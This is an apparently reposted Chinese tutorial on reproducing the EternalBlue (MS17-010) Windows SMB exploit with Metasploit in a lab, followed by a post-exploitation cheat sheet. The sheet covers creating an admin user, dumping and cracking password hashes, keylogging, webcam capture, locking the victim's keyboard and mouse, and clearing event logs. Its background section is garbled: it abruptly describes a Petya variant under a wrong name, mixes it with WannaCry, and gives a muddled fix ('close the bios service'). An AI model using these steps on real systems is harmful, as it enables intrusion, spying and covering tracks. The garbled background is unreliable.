一、永恒之藍的介紹

永恒之藍是指2017年4月14日晚，黑客團體Shadow Brokers（影子經紀人）公布一大批網絡攻擊工具，其中包含“永恒之藍”工具，“永恒之藍”利用Windows系統的SMB漏洞可以獲取系統最高權限。5月12日，不法分子通過改造“永恒之藍”制作了wannacry勒索病毒，英國、俄羅斯、整個歐洲以及中國國內多個高校校內網、大型企業內網和政府機構專網中招，被勒索支付高額贖金才能解密恢復文件。

二、漏洞描述

惡意代碼會掃描開放445文件共享端口的Windows機器，無需用戶任何操作，只要開機上網，不法分子就能在電腦和服務器中植入勒索軟件、遠程控制木馬、虛擬貨幣挖礦機等惡意程序。

本次黑客使用的是Petya勒索病毒的變種Petwarp，攻擊時仍然使用了永恒之藍勒索漏洞，并會獲取系統用戶名與密碼進行內網傳播。

本次爆發使用了已知OFFICE漏洞、永恒之藍SMB漏洞、局域網感染等網絡自我復制技術，使得病毒可以在短時間內呈爆發態勢。同時，該病毒與普通勒索病毒不同，其不會對電腦中的每個文件都進行加密，而是通過加密硬盤驅動器主文件表(MFT)，使主引導記錄(MBR)不可操作，通過占用物理磁盤上的文件名，大小和位置的信息來限制對完整系統的訪問，從而讓電腦無法啟動，相較普通勒索病毒對系統更具破壞性。

三、MSF介紹

Metasploit Framework(MSF)是一款開源安全漏洞檢測工具，附帶數千個已知的軟件漏洞，并保持持續更新。Metasploit可以用來信息收集、漏洞探測、漏洞利用等滲透測試的全流程，被安全社區冠以“可以黑掉整個宇宙”之名。剛開始的Metasploit是采用Perl語言編寫的，但是再后來的新版中，改成了用Ruby語言編寫的了，此工具在kali中是自帶的。

四、漏洞復現

復現環境

win7（192.168.8.146）（實驗前將防火墻徹底關閉）

win10（192.168.8.8）后續攻擊使用

kali（192.168.8.145）

先使用nmap對目標機進行掃描，查看其445端口是否開啟

在終端輸入msfconsole進入MSF

使用msf中的查找命令搜索關于永恒之藍的腳本：search ms17—010

其中：auxiliary為輔助模塊腳本；exploit為攻擊模塊腳本。

使用ms17-010輔助模塊

• 使用模塊 use 粘貼模塊

配置ms17-010的輔助性腳本

• 查看配置：show options

配置目標機IP地址：set RHOST +目標機ip

配置成功后，執行ms17-010的輔助性腳本run #運行模塊

使用ms17-010攻擊模塊

• 使用模塊 use 粘貼模塊

查看配置項

• 查看配置：show options

設置被攻擊機的ip地址：set RHOST +目標機ip

運行ms17-010攻擊模塊

成功建立會話后，使用一些功能shell

• 在此處可對目標機使用dos命令進行操作

• 使用exit可退出win7終端

入侵成功后

• 開啟遠程終端：需要雙終端操作

在shell中，新建一個用戶,將其加入管理員組

• 在meterpreter下使用run getgui -e，試目標機打開允許被遠程連接

• 用win10進行遠控

• 在meterpreter下進行進一步實驗

• 查看靶機相關進程信息：ps

• 查看靶機相關信息：sysinfo

• 截圖：screenshot

• 獲取靶機hash,破解密碼：hashdump

輸入hashdump

尋找一個在線MD5解密網站進行解密

• 還有很多其他的操作這里就不一一演示了

run scraper #查看目標主機詳細信息

load kiwi ???#加載

pwd ?? #查看目標當前目錄(windows)

getlwd ? #查看目標當前目錄(Linux)

search -f *.jsp -d e:\ ?????? #搜索E盤中所有以.jsp為后綴的文件

download e:\test.txt /root #將目標機的e:\test.txt文件下載到/root目錄下

upload /root/test.txt d:\test ? #將/root/test.txt上傳到目標機的 d:\test\ 目錄下

getpid ???#查看當前Meterpreter Shell的進程

idletime ?#查看主機運行時間

getuid ?? #查看獲取的當前權限

screenshot #截圖

webcam_list #查看目標主機的攝像頭

webcam_snap #拍照

webcam_stream ?????????????? #開視頻

execute 參數 -f 可執行文件 #執行可執行程序

run getgui -e ?????????#開啟遠程桌面

keyscan_start ?????????#開啟鍵盤記錄功能

keyscan_dump ?????? #顯示捕捉到的鍵盤記錄信息

keyscan_stop ????????#停止鍵盤記錄功能

uictl disable keyboard ????#禁止目標使用鍵盤

uictl enable keyboard ????#允許目標使用鍵盤

uictl disable mouse ????? #禁止目標使用鼠標

uictl enable mouse ????#允許目標使用鼠標

clearev ???????????#清除日志

• 修復方法

1.關閉bios服務，或開啟防火墻，屏蔽服務端口

2.給系統打上永恒之藍的漏洞修復補丁

總結

以上是生活随笔為你收集整理的永恒之蓝(ms17-010)简介与复现的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。